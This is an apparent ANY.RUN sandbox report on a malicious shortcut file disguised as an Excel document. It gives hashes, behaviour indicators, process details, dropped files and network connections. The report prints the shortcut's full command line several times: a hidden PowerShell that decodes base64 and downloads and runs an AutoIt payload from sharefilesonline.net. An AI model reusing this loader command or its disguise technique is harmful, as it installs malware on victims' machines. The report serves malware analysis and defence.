download:

/Downloads/MixDep2025.xls.lnk

Full analysis: https://app.any.run/tasks/fa2288b4-3759-4f54-acb3-a0b31d2a5d4e
Verdict: Malicious activity
Analysis date: March 15, 2025, 23:43:55
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
autoit
susp-powershell
arch-exec
Indicators:
MIME: application/x-ms-shortcut
File info: MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Unicoded, Archive, ctime=Tue Dec 17 10:41:13 2024, atime=Wed Feb 26 17:06:33 2025, mtime=Tue Dec 17 10:41:13 2024, length=245760, window=showminnoactive, IDListSize 0x0135, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\", LocalBasePath "C:\Windows\System32\cmd.exe"
MD5:

27BC8CF12690AEC8DF78B3CF6E298B63

SHA1:

F3C1A714DEE2413A97F5FA0588A90B84A6A95E5C

SHA256:

65729A2AC815D385EAE0EC53CB58EDC12BC915AC81BF7AA40D48B06029F2E243

SSDEEP:

48:8s5JeDTsA2A3TlYPXqhMkClF66VUAv0BhQGuP:8sL59A3G/qh3Cn9R3R

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 4560)

  • SUSPICIOUS

    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 660)

    • Gets path to any of the special folders (POWERSHELL)

      • powershell.exe (PID: 4560)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 4560)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 660)
      • cmd.exe (PID: 8044)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 4560)

    • Extracts files to a directory (POWERSHELL)

      • powershell.exe (PID: 4560)

    • Starts the AutoIt3 executable file

      • powershell.exe (PID: 4560)

    • Reads security settings of Internet Explorer

      • a.exe (PID: 7904)
      • ShellExperienceHost.exe (PID: 8168)

    • Starts CMD.EXE for commands execution

      • a.exe (PID: 7904)

    • Gets file extension (POWERSHELL)

      • powershell.exe (PID: 8092)

    • Potential Corporate Privacy Violation

      • a.exe (PID: 7904)

    • Sets XML DOM element text (SCRIPT)

      • splwow64.exe (PID: 7932)

  • INFO

    • Disables trace logs

      • powershell.exe (PID: 4560)

    • Checks proxy server information

      • powershell.exe (PID: 4560)
      • a.exe (PID: 7904)
      • BackgroundTransferHost.exe (PID: 7872)
      • slui.exe (PID: 7232)

    • The executable file from the user directory is run by the Powershell process

      • a.exe (PID: 7904)

    • Reads mouse settings

      • a.exe (PID: 7904)

    • Checks supported languages

      • a.exe (PID: 7904)
      • ShellExperienceHost.exe (PID: 8168)

    • Reads the computer name

      • a.exe (PID: 7904)
      • ShellExperienceHost.exe (PID: 8168)

    • The sample compiled with english language support

      • powershell.exe (PID: 4560)

    • Reads the machine GUID from the registry

      • a.exe (PID: 7904)

    • Found Base64 encoded network access via PowerShell (YARA)

      • cmd.exe (PID: 660)
      • powershell.exe (PID: 4560)

    • Creates files in the program directory

      • a.exe (PID: 7904)

    • Found Base64 encoded access to environment variables via PowerShell (YARA)

      • cmd.exe (PID: 660)
      • conhost.exe (PID: 780)
      • powershell.exe (PID: 4560)

    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • cmd.exe (PID: 660)
      • powershell.exe (PID: 4560)

    • Reads the software policy settings

      • a.exe (PID: 7904)
      • BackgroundTransferHost.exe (PID: 7872)
      • slui.exe (PID: 7396)
      • slui.exe (PID: 7232)

    • Found Base64 encoded file access via PowerShell (YARA)

      • cmd.exe (PID: 660)
      • powershell.exe (PID: 4560)
      • conhost.exe (PID: 780)

    • Creates files or folders in the user directory

      • a.exe (PID: 7904)
      • BackgroundTransferHost.exe (PID: 7872)

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 8092)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 8092)

    • Reads security settings of Internet Explorer

      • BackgroundTransferHost.exe (PID: 3140)
      • BackgroundTransferHost.exe (PID: 7872)
      • BackgroundTransferHost.exe (PID: 8064)
      • BackgroundTransferHost.exe (PID: 8052)
      • BackgroundTransferHost.exe (PID: 536)
      • splwow64.exe (PID: 7932)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 8092)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: IDList, LinkInfo, Description, RelativePath, WorkingDir, CommandArgs, IconFile, Unicode
FileAttributes: Archive
CreateDate: 2024:12:17 10:41:13+00:00
AccessDate: 2025:02:26 17:06:33+00:00
ModifyDate: 2024:12:17 10:41:13+00:00
TargetFileSize: 245760
IconIndex: (none)
RunWindow: Show Minimized No Activate
HotKey: (none)
TargetFileDOSName: cmd.exe
DriveType: Fixed Disk
DriveSerialNumber: D408-2CA4
VolumeLabel: -
LocalBasePath: C:\Windows\System32\cmd.exe
Description: Document Shortcut
RelativePath: ..\..\..\..\..\..\..\..\Windows\System32\cmd.exe
WorkingDirectory: C:\Users\Work\Desktop
CommandLineArguments: /c powershell -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHRlbXA9W1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKTskZG9jdW1lbnRzPVtTeXN0ZW0uRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdNeURvY3VtZW50cycpO0ludm9rZS1XZWJSZXF1ZXN0IC1VcmkgJ2h0dHBzOi8vc2hhcmVmaWxlc29ubGluZS5uZXQvTWl4RGVwMjAyNS54bHN4JyAtT3V0RmlsZSAiJGRvY3VtZW50c1xNaXhEZXAyMDI1Lnhsc3giO1N0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICIkZG9jdW1lbnRzXE1peERlcDIwMjUueGxzeCI7SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnaHR0cHM6Ly9zaGFyZWZpbGVzb25saW5lLm5ldC9lcncuemlwJyAtT3V0RmlsZSAiJHRlbXBcZXJ3LnppcCI7QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uRmlsZVN5c3RlbTtbU3lzdGVtLklPLkNvbXByZXNzaW9uLlppcEZpbGVdOjpFeHRyYWN0VG9EaXJlY3RvcnkoIiR0ZW1wXGVydy56aXAiLCAkdGVtcCk7U3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIiR0ZW1wXGEuZXhlIiAtQXJndW1lbnRMaXN0ICIkdGVtcFxQLmEzeCIgLU5vTmV3V2luZG93IC1XYWl0DQojIEJSQUJVUw0K')) | Invoke-Expression"
IconFileName: .\Document.xls
MachineID: desktop-8cluclv
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
160
Monitored processes
20
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start cmd.exe no specs conhost.exe no specs powershell.exe sppextcomobj.exe no specs slui.exe excel.exe a.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs backgroundtransferhost.exe no specs backgroundtransferhost.exe backgroundtransferhost.exe no specs backgroundtransferhost.exe no specs backgroundtransferhost.exe no specs slui.exe splwow64.exe no specs shellexperiencehost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
536"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1C:\Windows\System32\BackgroundTransferHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
660"C:\Windows\System32\cmd.exe" /c powershell -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHRlbXA9W1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKTskZG9jdW1lbnRzPVtTeXN0ZW0uRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdNeURvY3VtZW50cycpO0ludm9rZS1XZWJSZXF1ZXN0IC1VcmkgJ2h0dHBzOi8vc2hhcmVmaWxlc29ubGluZS5uZXQvTWl4RGVwMjAyNS54bHN4JyAtT3V0RmlsZSAiJGRvY3VtZW50c1xNaXhEZXAyMDI1Lnhsc3giO1N0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICIkZG9jdW1lbnRzXE1peERlcDIwMjUueGxzeCI7SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnaHR0cHM6Ly9zaGFyZWZpbGVzb25saW5lLm5ldC9lcncuemlwJyAtT3V0RmlsZSAiJHRlbXBcZXJ3LnppcCI7QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uRmlsZVN5c3RlbTtbU3lzdGVtLklPLkNvbXByZXNzaW9uLlppcEZpbGVdOjpFeHRyYWN0VG9EaXJlY3RvcnkoIiR0ZW1wXGVydy56aXAiLCAkdGVtcCk7U3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIiR0ZW1wXGEuZXhlIiAtQXJndW1lbnRMaXN0ICIkdGVtcFxQLmEzeCIgLU5vTmV3V2luZG93IC1XYWl0DQojIEJSQUJVUw0K')) | Invoke-Expression"C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
780\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1164\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2108C:\WINDOWS\system32\cmd.exe /c python.exe logo.pngC:\Windows\SysWOW64\cmd.exea.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
3140"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1C:\Windows\System32\BackgroundTransferHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
4560powershell -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHRlbXA9W1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKTskZG9jdW1lbnRzPVtTeXN0ZW0uRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdNeURvY3VtZW50cycpO0ludm9rZS1XZWJSZXF1ZXN0IC1VcmkgJ2h0dHBzOi8vc2hhcmVmaWxlc29ubGluZS5uZXQvTWl4RGVwMjAyNS54bHN4JyAtT3V0RmlsZSAiJGRvY3VtZW50c1xNaXhEZXAyMDI1Lnhsc3giO1N0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICIkZG9jdW1lbnRzXE1peERlcDIwMjUueGxzeCI7SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnaHR0cHM6Ly9zaGFyZWZpbGVzb25saW5lLm5ldC9lcncuemlwJyAtT3V0RmlsZSAiJHRlbXBcZXJ3LnppcCI7QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uRmlsZVN5c3RlbTtbU3lzdGVtLklPLkNvbXByZXNzaW9uLlppcEZpbGVdOjpFeHRyYWN0VG9EaXJlY3RvcnkoIiR0ZW1wXGVydy56aXAiLCAkdGVtcCk7U3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIiR0ZW1wXGEuZXhlIiAtQXJndW1lbnRMaXN0ICIkdGVtcFxQLmEzeCIgLU5vTmV3V2luZG93IC1XYWl0DQojIEJSQUJVUw0K')) | Invoke-Expression"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7232C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
7352C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Exit code:
0
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
7396"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exe
SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
Total events
22 078
Read events
21 792
Write events
258
Delete events
28

Modification events

(PID) Process:(4560) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xlsx\OpenWithProgids
Operation:writeName:Excel.Sheet.12
Value:
(PID) Process:(4560) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
Operation:writeName:{33154C99-BF49-443D-A73C-303A23ABBE97} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF
Value:
01000000000000006781EC240496DB01
(PID) Process:(7404) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\EXCEL\7404
Operation:writeName:0
Value:
0B0E10C1B0724EFD8BD1408DA30125C337E10A230046B8B4F3E5C2C0E5ED016A04102400449A7D64B29D01008500A907556E6B6E6F776EC906022222CA0DC2190000C91003783634C511EC39D2120965007800630065006C002E00650078006500C51620C517808004C91808323231322D44656300
(PID) Process:(7404) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel
Operation:writeName:ImmersiveWorkbookDirtySentinel
Value:
0
(PID) Process:(7404) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel
Operation:writeName:ExcelPreviousSessionId
Value:
{4E72B0C1-8BFD-40D1-8DA3-0125C337E10A}
(PID) Process:(7404) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common
Operation:writeName:SessionId
Value:
07D870B5DA07B04A93253D1C3561FE2C
(PID) Process:(7404) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\GracefulExit\EXCEL\5396
Operation:delete valueName:0
Value:
ซ洐郘Ꙏ蒢㗷ⅾ䛢꿸놜樁င$驄摽鶲…ީ湕湫睯쥮Ȇ∢්łᣂ숁씀褎예錏�菈Ǭ჉砃㐶ᇅ⪔ዒ攉砀挀攀氀⸀攀砀攀씀‖ៅ肀줄࠘㈲㈱䐭捥
(PID) Process:(7404) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\GracefulExit\EXCEL\5396
Operation:delete keyName:(default)
Value:
(PID) Process:(7404) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\EXCEL\7404
Operation:writeName:0
Value:
0B0E10C1B0724EFD8BD1408DA30125C337E10A230046B8B4F3E5C2C0E5ED016A04102400449A7D64B29D01008500A907556E6B6E6F776EC906022222CA0DC2190000C50E8908C91003783634C511EC39D2120965007800630065006C002E00650078006500C51620C517808004C91808323231322D44656300
(PID) Process:(7404) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Sampling
Operation:writeName:1
Value:
01D014000000001000B24E9A3E02000000000000000600000000000000
Executable files
2
Suspicious files
32
Text files
9
Unknown types
0

Dropped files

PID
Process
Filename
Type
4560powershell.exeC:\Users\admin\AppData\Local\Temp\erw.zipcompressed
MD5:B3C2C56FF4E267B3035FDAA99DBB6D1B
SHA256:C010AF5721DD82689CCBC529C180006F616761631E2A14B953535897BD778356
4560powershell.exeC:\Users\admin\Documents\MixDep2025.xlsxcompressed
MD5:9E26F110937F73E856D38D2E733B27C3
SHA256:E2CD27668646BA938A0A3429488CBD12C717CD17A58BB7BCBB08CED5576914C0
4560powershell.exeC:\Users\admin\AppData\Local\Temp\P.a3xbinary
MD5:12D4CCEE2835AB497DE4D8C12C7F3AB6
SHA256:CBC8A218DEC949323C2952CA672A854CDF1AAC635BF08C6342D0C568D6F48578
4560powershell.exeC:\Users\admin\AppData\Local\Temp\a.exeexecutable
MD5:0ADB9B817F1DF7807576C2D7068DD931
SHA256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
7904a.exeC:\ProgramData\py.ziphtml
MD5:CB4BA972B7C65FA077C154C26F0750F0
SHA256:C5B27B9C0A09C33862899F343C1F8D848B4674F80F4D27119C97C23F64F64310
8092powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_rrykrgzk.mr5.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7904a.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E573CDF4C6D731D56A665145182FD759_5A9FE11E8B6335FDA91281200971E038binary
MD5:5E1A54E778A82F59BE129D7D6247AE0E
SHA256:F07D43D8AE3A579DACE70B0403A986320DE1ED72EED5B61C02C6438CD0B27998
8092powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_eksr4kf2.ih5.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7872BackgroundTransferHost.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\f92f0722-10a8-4bab-855f-c9a8a91455c6.down_data
MD5:
SHA256:
8092powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_4lhrpwbe.emh.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
10
TCP/UDP connections
39
DNS requests
28
Threats
1

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
23.48.23.143:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
7724
SIHClient.exe
GET
200
23.219.150.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
7404
EXCEL.EXE
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA77flR%2B3w%2FxBpruV2lte6A%3D
unknown
whitelisted
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
7904
a.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAbY2QTVWENG9oovp1QifsQ%3D
unknown
whitelisted
7904
a.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTk45WiKdPUwcMf8JgMC07ACYqr2AQUt2ui6qiqhIx56rTaD5iyxZV2ufQCEAyVRp0LO%2F899HuOUNmwbkY%3D
unknown
whitelisted
2148
backgroundTaskHost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
7724
SIHClient.exe
GET
200
23.219.150.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
7404
EXCEL.EXE
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEApDqVCbATUviZV57HIIulA%3D
unknown
whitelisted
7872
BackgroundTransferHost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
23.48.23.143:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
6544
svchost.exe
40.126.32.136:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
3216
svchost.exe
40.115.3.253:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
5496
MoUsoCoreWorker.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4560
powershell.exe
66.248.206.135:443
sharefilesonline.net
Hostkey B.v.
NL
unknown
7904
a.exe
162.125.66.18:443
www.dropbox.com
DROPBOX
DE
whitelisted
7904
a.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 51.124.78.146
whitelisted
crl.microsoft.com
  • 23.48.23.143
  • 23.48.23.164
whitelisted
google.com
  • 142.250.185.174
whitelisted
login.live.com
  • 40.126.32.136
  • 20.190.160.20
  • 40.126.32.140
  • 40.126.32.134
  • 20.190.160.5
  • 20.190.160.130
  • 40.126.32.74
  • 20.190.160.66
whitelisted
ocsp.digicert.com
  • 2.17.190.73
  • 2.23.77.188
whitelisted
client.wns.windows.com
  • 40.115.3.253
whitelisted
sharefilesonline.net
  • 66.248.206.135
unknown
www.dropbox.com
  • 162.125.66.18
whitelisted
arc.msn.com
  • 20.223.36.55
whitelisted
officeclient.microsoft.com
  • 52.109.28.46
whitelisted

Threats

PID
Process
Class
Message
7904
a.exe
Potential Corporate Privacy Violation
ET INFO Dropbox.com Offsite File Backup in Use
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
/Downloads/MixDep2025.xls.lnk